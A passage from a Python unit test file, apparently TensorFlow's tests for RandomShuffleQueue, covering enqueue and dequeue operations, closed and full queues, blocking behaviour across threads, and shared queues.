results.append((a, b))
a, b = sess.run(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = self.evaluate(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], self.evaluate(size))
dequeued_t.op.run()
self.assertEqual([0], self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, self.evaluate(size_t))
enqueue_op.run()
self.assertEqual(0, self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpTo(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testEmptyDequeueUpToWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = self.evaluate(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.cached_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(self.evaluate(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
min_size = 2
q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
# Manually dequeue until we hit min_size.
results.append(sess.run(dequeued_t))
results.append(sess.run(dequeued_t))
def blocking_dequeue():
results.append(sess.run(dequeued_t))
results.append(sess.run(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=blocking_dequeue)
dequeue_thread.start()
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, self.evaluate(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
# While the last dequeue failed, we want to insure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(sess.run(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
self.evaluate(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
# elements, and is blocked waiting for one more element to be dequeue.
for i in range(50):
queue_size = self.evaluate(size_t)
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
